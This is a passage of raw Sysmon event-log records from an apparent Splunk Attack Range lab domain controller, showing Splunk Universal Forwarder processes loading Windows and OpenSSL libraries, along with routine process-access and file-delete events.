Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.053{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 
734700x800000000000000099355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000099352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000099347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:49.037{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:49.037{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.037{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:49.038{326FD73D-C0F1-6294-3B0B-000000005502}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000099445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:50.678{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35F4EB3B07EC58CCE9213B1792DA0BBD,SHA256=DA97BAD7A98CA095B3D63EE8994A2F27420915EE654645F50C4DF76ADBCC27FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000099444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:50.162{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4AA1649B63DF9217CA766583F2901A9D,SHA256=712206C2F839BF514A24FF39967A464EBD70B03EDB6A576127A141F3CBE5934D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.396{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000099496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.396{326FD73D-C0F3-6294-3D0B-000000005502}40444868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
734700x800000000000000099495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.396{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.396{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.225{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 
734700x800000000000000099485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program 